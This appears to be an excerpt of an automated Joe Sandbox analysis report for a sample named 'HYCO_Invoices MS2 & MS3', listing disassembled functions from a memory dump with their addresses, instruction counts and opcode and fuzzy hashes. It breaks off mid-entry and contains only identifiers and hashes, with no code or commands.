                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                        • Instruction ID: 5c56ce40c3f647bef9fc31611cbb19c313ebfed12f529824c7379bd831e7902f
                                                                                                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                        • Instruction Fuzzy Hash: A6F01D7220001DBFEF029F94DD80DEF7B7EFB59298B104125FA11A6160D636DD21ABA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0107A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4d44aa59e1c69b971c0be942a6e3bfe2ef6851dafe05f3f4481bc15863c56484
                                                                                                                                        • Instruction ID: 8ab2274ef74f7e0c9465e520be78cf31a2b7bae6fea9dd415a53a8de38733cb3
                                                                                                                                        • Opcode Fuzzy Hash: 4d44aa59e1c69b971c0be942a6e3bfe2ef6851dafe05f3f4481bc15863c56484
                                                                                                                                        • Instruction Fuzzy Hash: C4018536600209EBCF129F84DC40EDE3FA6FB4C664F0A8105FE586A260C736D970EB81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FEC0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b97a6165d6d1860ad0760af208777c5f7f196b3e01779bccad834834d966204d
                                                                                                                                        • Instruction ID: d41e5e68aff4eecbad156d380c9cd7768924b8d30febb92cbca119d3f43254ce
                                                                                                                                        • Opcode Fuzzy Hash: b97a6165d6d1860ad0760af208777c5f7f196b3e01779bccad834834d966204d
                                                                                                                                        • Instruction Fuzzy Hash: 4FF02B727043825BE314A51B9D02F723295DBD0760F29807AF7058B2D3F979DC02A7D4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b21d3e831fe545a98b84ad30c883cb244d7309a6c6307292f67abd426d95013b
                                                                                                                                        • Instruction ID: c7f8609f9700d61463af307d19c19bcb2e6e011d22cd34e9ac29254fcc4e538e
                                                                                                                                        • Opcode Fuzzy Hash: b21d3e831fe545a98b84ad30c883cb244d7309a6c6307292f67abd426d95013b
                                                                                                                                        • Instruction Fuzzy Hash: 2B018170204695DFF373AB2CCD48B6A37E8AB50B04F484590FAC1CF6D6D729D4418210
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0109437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                        • Instruction ID: 88166244a008bba0c911c7d33cba88acd59ece7d47132dc424f2da5d50a196ce
                                                                                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                        • Instruction Fuzzy Hash: 4DF0E931341D1347EFB6AA3E8970B2EBAD5AF90A01B05C56C99C5DB680DF60DC029780
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0107E872 Relevance: .0, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                        • Instruction ID: f45269e6265ced5b86624b97109614bb118bd7e04938764ba0a2aee3401a23c3
                                                                                                                                        • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                        • Instruction Fuzzy Hash: B1F05432B125119FE3A29A4DCC80F16B7A8AFD5A60F5900F5A6489F260C760EC0187E4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0107C89D Relevance: .0, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: da0f062362cd5ef13977323be0e4b3712450fcfa6d5ef2d053876e50dbe7f482
                                                                                                                                        • Instruction ID: 1784a15fcfdd96ccc697b4625de433866be309c92e1ba393e93233f28648538c
                                                                                                                                        • Opcode Fuzzy Hash: da0f062362cd5ef13977323be0e4b3712450fcfa6d5ef2d053876e50dbe7f482
                                                                                                                                        • Instruction Fuzzy Hash: 3AF0AF706153459FD350EF28C542A1BB7E4FF98710F40865AB8D8DB390EA38E900C796
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01020854 Relevance: .0, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                        • Instruction ID: daf9d9a434ba84ab0a32e8a6cd547a1820efc56f3516de2b70af944c27bd6e5b
                                                                                                                                        • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                        • Instruction Fuzzy Hash: 7FF0BE72610204AFE724DB26CC05F97B6E9EF98340F148079E9C5D72A4FAF1EE01D6A4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01078D20 Relevance: .0, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 32ef610a1eb73c32cf103f0e676e881a8fdf2f22a66a87b5f9cc385e353c458b
                                                                                                                                        • Instruction ID: 1baa108a97028868e269b3b2110305eec6039a3a57c88e3ab18fc43b041aeeec
                                                                                                                                        • Opcode Fuzzy Hash: 32ef610a1eb73c32cf103f0e676e881a8fdf2f22a66a87b5f9cc385e353c458b
                                                                                                                                        • Instruction Fuzzy Hash: 4AF024368002486FD6217A1DEC4CB5ABBD9FF90714F09485EF9D42F2218678AC80C784
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0107C912 Relevance: .0, Instructions: 34COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 38c4d1b775e50c23c97607e6d6cfdde6e93cd8374e2ef358810eb07e66c31202
                                                                                                                                        • Instruction ID: 5d8bdcc14104591457f0637f8d554e724e833dc5e43d6c3ec9195286cc769f15
                                                                                                                                        • Opcode Fuzzy Hash: 38c4d1b775e50c23c97607e6d6cfdde6e93cd8374e2ef358810eb07e66c31202
                                                                                                                                        • Instruction Fuzzy Hash: 12F06270A0124EEFDB44EF69D655A9EB7F4FF58300F008056B995EB385DA38EA01CB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF47FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ddb6f598010ca1a2f9b5a401090cc2a44b224b1627e68d499fb084d2deb95efc
                                                                                                                                        • Instruction ID: 78b225c2f89b670684dff53496446dba8933bee25b5edce1746b086d79a72d15
                                                                                                                                        • Opcode Fuzzy Hash: ddb6f598010ca1a2f9b5a401090cc2a44b224b1627e68d499fb084d2deb95efc
                                                                                                                                        • Instruction Fuzzy Hash: 94F0F031C022DD8ED7228B18C444B7377C4AF10BB0F0C486AC69993121C364FC80E640
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010B0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5086e766ad049732654df51e28bd97f1e93829c335beb1a0af572d21882aca07
                                                                                                                                        • Instruction ID: b39aca836b86da0a717ab70541825cade026a19d3170853b692bca5f4098b9ac
                                                                                                                                        • Opcode Fuzzy Hash: 5086e766ad049732654df51e28bd97f1e93829c335beb1a0af572d21882aca07
                                                                                                                                        • Instruction Fuzzy Hash: D4F027764156850ACB766B6DB4E02D62FF8A761520F4918C9D4E05B20AC57F8883C720
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 534b8bc0a5e8871aa5b6fde5161fe91e542025c61477afcc578fbd93a1bfd998
                                                                                                                                        • Instruction ID: af7aa4c5c70cc8807f60a7cd78481b269a9c0bbb7da9a6be92a9983d1ba7ef9f
                                                                                                                                        • Opcode Fuzzy Hash: 534b8bc0a5e8871aa5b6fde5161fe91e542025c61477afcc578fbd93a1bfd998
                                                                                                                                        • Instruction Fuzzy Hash: 44F02E714012A28FF3B2971CC30CB597BD8AB08BA0F0894E5C48A83202C3A0E880CA61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                        • Instruction ID: 1d413c59e67891dc9f46c295eafcedce0f19158486f786a5ade047072c48481a
                                                                                                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                        • Instruction Fuzzy Hash: B6E0D8323006412BE7129F598CC4F8777AEDFD6B10F04047DB5445F291C9E2DC0986A4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01086030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                        • Instruction ID: 1845c729129f585dd4d7804b2999ff372c741cf51f9ac7e7e4786f84278a1656
                                                                                                                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                        • Instruction Fuzzy Hash: 97F08C721082049FE3219F09D844F53B7F8EB05364F02C065E6888B160D33AEC41CFA8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF0710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                        • Instruction ID: f2c577b217d4784d19b6435dac4e72e0cb936e5ebbb26053ae15334da6f64edb
                                                                                                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                        • Instruction Fuzzy Hash: FDF0A07A2043499BEB16EF19D040AA57BE4FB51350B100095E9828B352DB35E982DB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010249D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                        • Instruction ID: dde26d9d6f1b0e90a92a345ef6d59ef08eb83617e721d2fd22c43b5703bd25c1
                                                                                                                                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                        • Instruction Fuzzy Hash: D0E0D832248195ABD3211A598800B6A77E5DBD47A0F150429E2C0CB150DBB0DC40C7D8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FEEC20 Relevance: .0, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                                                                        • Instruction ID: 1c6818fcdcad95f5647009575a7ccc87820592bd88501708a499f9617025b604
                                                                                                                                        • Opcode Fuzzy Hash: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                                                                        • Instruction Fuzzy Hash: 0DF0E5311042C8AFEF18CB0AE805F553799EB18734F208419F4088B052CB75DC88EB04
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0109678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                        • Instruction ID: 9b7308e0cc7b34572c4628ffa705715644dcf46b7b104801b23847c5630b6702
                                                                                                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                        • Instruction Fuzzy Hash: 64E0DF32A40124FBEF22A7998D05F9ABEACEB94FA0F050054B680E71D0E531DE00D690
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF25E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 7f0f35dca5546c8004018943da3bd1972a2585385c124c017b84696e5b72df9e
                                                                                                                                        • Instruction ID: fb8eacdd5c3c9ecc7fc40e8021318d388acc250b0d0c3bff2b770a960aebe333
                                                                                                                                        • Opcode Fuzzy Hash: 7f0f35dca5546c8004018943da3bd1972a2585385c124c017b84696e5b72df9e
                                                                                                                                        • Instruction Fuzzy Hash: 6EE092321009589BC722BB2ADD02F9B779AEFA4764F014515B1659B1E1CB75A810C784
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01074000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                        • Instruction ID: 67ded82ecb4c0f3f986c08b87148b56015157fdb15e7589c59ae53ea6763dc74
                                                                                                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                        • Instruction Fuzzy Hash: ACE0C2347003058FE756CF19C044B667BF6BFD5A10F28C0A8A9888F205EB32E842CB84
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FE823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                        • Instruction ID: 57f5199091f39ccece7b0033c2032fc9ab05d238149a5047a182c4e05d6bd2a1
                                                                                                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                        • Instruction Fuzzy Hash: 2BE0C232440A64EFDB323F16DC00F9176A5FFA4BA0F204869E1C90A0A48B70AC82FB44
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FE8C8D Relevance: .0, Instructions: 21COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                                                                        • Instruction ID: 45e7e3835e680fe8feb824a48627ff831e92b8bee9b58b2449882b41ebf70e7f
                                                                                                                                        • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                                                                        • Instruction Fuzzy Hash: F3E08631401A61DEE7327F1BED44F9276A5BB51750F204869A086094A0CB74AC86E695
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF2050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 524b36ab805d9411d98b435cd50541a23b6e7230ac1a6283ae9218439906302f
                                                                                                                                        • Instruction ID: 47bc752a411f6a0cb60036fdf916dd458e202117b3c6a6e8f56f9c06567d9cd2
                                                                                                                                        • Opcode Fuzzy Hash: 524b36ab805d9411d98b435cd50541a23b6e7230ac1a6283ae9218439906302f
                                                                                                                                        • Instruction Fuzzy Hash: F4E08C322004586BC622FA5EED01E9A739AEFA4760F000121B2A08B2E0CA69AC00C794
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01028A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                        • Instruction ID: 524c30651caacc916e9a6b7bf6aabaa2ce76f73ca09c9b5e2947b88768a45e94
                                                                                                                                        • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                        • Instruction Fuzzy Hash: DDE08633111A1487D728DE18D511B7677E4EF45720F09863FE65347781C934E544C798
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01046AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                        • Instruction ID: 7476793e7181d414cd4ccd0db9833a2d72a5fbf77f9cae379a5f5cae5fb6c02c
